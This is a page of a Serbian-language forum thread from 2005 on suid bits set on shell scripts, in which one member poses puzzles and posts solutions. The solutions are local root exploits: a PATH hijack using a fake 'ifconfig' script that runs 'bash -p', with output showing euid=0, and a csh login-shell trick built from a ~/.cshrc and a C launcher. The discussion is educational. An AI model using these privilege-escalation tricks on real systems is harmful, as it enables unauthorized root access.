Suid bit i tekstualne datoteke

Подели преко

This topic has 51 одговор, 9 гласова, and was last updated 19 years, 2 months раније by maddox.

Гледање 31 чланака - 31 до 40 (од 52 укупно)

← 1 2 3 4 5 6 →

Аутор

Чланци
1. децембар 2005. у 9:55 pm #37912

japan
Учесник

uh… predajem se… 😆

kako prevariti strcmp() ?

1. децембар 2005. у 10:19 pm #37913

popeye
Главни мајстор

Tražio si zeca u pogrešnom grmu. 😉

ifconfig:[code]#!/bin/bash -p

. /bin/bash -p[/code]

$ vi ifconfig
$ chmod 755 ifconfig
$ PATH=”.” ./a.out eth0
# id
uid=1000(popeye) gid=1000(popeye) euid=0(root)

1. децембар 2005. у 10:27 pm #37914

popeye
Главни мајстор

za ovo već nisam siguran, možda neki ” ili tako nešto…

Nije mi cilj bio da pričam o prelivanju bafera, to je malo duža (i komplikovanija za neupućene) tema. Ovo oko skripti, odnosno system() funkcije, je lakše za poimanje.

1. децембар 2005. у 10:44 pm #37915

japan
Учесник

Tražio si zeca u pogrešnom grmu. 😉

znao sam da je neka koska 😛

nije ni prelivanje bafera mnogo teško za shvatiti, samo je potrebno znati kako funkcioniše izvršavanje programa na nivou procesora… a to se uz dobru literaturu lako da naučiti…

1. децембар 2005. у 10:57 pm #37916

popeye
Главни мајстор

Ma stoji da je prosto, ali ni ovde se niko ne javlja. Pre nekog vremena je neko jednom tražio otvaranje foruma “Sigurnost” i tom prilikom sam odgovorio da za takvim forumom nema dovoljno korisnika koji bi učestvovali u nekoj normalnoj diskusiji. Danas sam malo zaludniji pa iskoristih ovu temu da vidim kako stoje stvari.

1. децембар 2005. у 11:10 pm #37917

LimitMan
Учесник

Mene zanima … Mada stvarno nemam snage za vecu raspravu (neispavan, radio previse i sl…). Samo vas gledam i iskreno … saznajem neke nove stvari 😉 Mada je dosta tu i starih …

1. децембар 2005. у 11:14 pm #37918

popeye
Главни мајстор

znao sam da je neka koska 😛

Hehe, ima puna korpa koski.

Šta misliš, u čemu je problem u ovoj skripti:

[code]#!/bin/csh

echo “Test!”[/code]

Pod pretpostavkom da je je vlasnik root, dozvole su 4755 i sistem poštuje suid bit na skripti, može li se dobiti root shell?

1. децембар 2005. у 11:24 pm #37919

LimitMan
Учесник

zaista ne vidim kako bi “Hello world” primer mogao da bude access to root preko suid-a …

Ako je to moguce … onda je sve moguce 😀

1. децембар 2005. у 11:45 pm #37920

japan
Учесник

pomoslio sam da je dovoljno uraditi isto što i malopre, ali izgleda da nije…

2. децембар 2005. у 1:32 am #37921

popeye
Главни мајстор

~/.cshrc:
[code]/bin/bash -p[/code]

pokretac.c:
[code]#include

int main() {

execl(“test.sh”,”-“,0);
return 0;

}
[/code]

$ vi ~/.cshrc
$ vi pokretac.c
$ make pokretac
$ ./pokretac.c
$ ps
PID TTY TIME CMD
26292 pts/0 00:00:00 bash
26370 pts/0 00:00:00 test.sh
26371 pts/0 00:00:00 bash
26380 pts/0 00:00:00 ps

Kao što vidiš, dve instance bash školjke su pokrenute. Izlaskom iz tako dobijenog shella, izvršava se test.sh (ispisuje se “Test!”). Kada bi sistem dozvolio suid za skriptu, ovo bi trebao biti root shell.
Аутор

Чланци

Гледање 31 чланака - 31 до 40 (од 52 укупно)

← 1 2 3 4 5 6 →

Мораш бити пријављен да би поставио коментар у овој теми.